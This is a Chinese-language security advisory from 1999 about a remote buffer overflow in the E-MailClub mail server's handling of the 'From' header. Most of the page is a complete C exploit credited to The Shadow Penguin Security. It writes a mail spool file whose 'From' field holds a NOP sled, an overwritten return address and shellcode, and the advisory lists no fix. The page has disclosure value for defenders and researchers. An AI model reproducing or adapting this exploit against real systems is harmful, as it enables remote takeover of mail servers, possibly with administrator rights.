E-MailClub的'FROM'远程溢出发布时间:1999-11-19 更新时间:1999-11-19 严重程度:高 威胁程度:远程管理员权限 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 Misc详细描述 EMAILCLUB作为是一个由ADMIRAL SYSTEMS INC的MAIL服务 器包, 发现它有一个远程溢出漏洞,此漏洞可以通过 EMAILCLUB的 POP3服务器对进来的邮件缺少对‘FROM’正 确的边界检查 而导致的缓冲溢出;由于此MAIL程序在NT, WIN9X上运行,所以 可以导致目标机器上获得不同的危害程 度,尤其是NT中如果管理员 采用ADMIN权利在运行 EMAILCLUB。 测试代码 /*=============================================== =========== E-MailClub Ver1.0.0.5 for Windows98J exploit The Shadow Penguin Security (http://shadowpenguin.backsection.net) Written by UNYUN (shadowpenguin@backsection.net) ================================================= ======================== */ #include #include #define HD1 \ "From exploit Wed Oct 27 01:53 JST 1999\n"\ "Date: Wed, 27 Oct 1999 01:53:00 +0900\n" #define HD2 \ "Message-Id: <3815C9EBDC.E749HOGE@192.168.0.1>\n"\ "MIME-Version: 1.0\n"\ "Content-Transfer-Encoding: 7bit\n"\ "Content-Type: text/plain; charset=US-ASCII\n"\ "Content-Length: 1\n"\ "Status: U\n\n\n\n" #define MAXBUF 2000 #define MAXBUF2 500 #define NOP 0x90 #define RETADR 511 #define EIP 0x7fc1415b unsigned char exploit_code[100]={ 0xb8,0x55,0x55,0x55, 0x55,0x50,0x50,0xB8, 0x96,0x91,0xFA,0x5F, 0x03,0xC0,0x50,0xc3, }; main(int argc, char *argv[]) { FILE *fp; char buf[MAXBUF]; unsigned int ip; if (argc!=2){ printf("usage: %s mailspool\n",argv[0]); exit(1); } if ((fp=fopen(argv[1],"wb"))==NULL){ printf("Can not write to %s\n",argv[1]); exit(1); } memset(buf,NOP,MAXBUF); buf[MAXBUF-1]=0; ip=EIP; buf[RETADR-1]=0xa0; buf[RETADR ]=ip&0xff; buf[RETADR+1]=(ip>>8)&0xff; buf[RETADR+2]=(ip>>16)&0xff; buf[RETADR+3]=(ip>>24)&0xff; strncpy(buf+RETADR+40,exploit_code,strlen (exploit_code)); fprintf(fp,"%s",HD1); fprintf(fp,"From: %s \n",buf); fprintf(fp,"To: you@your.host.net\n"); fprintf(fp,"Subject: subscribe exploit\n"); fprintf(fp,"%s",HD2); fclose(fp); } 解决方案 暂无 相关信息 |
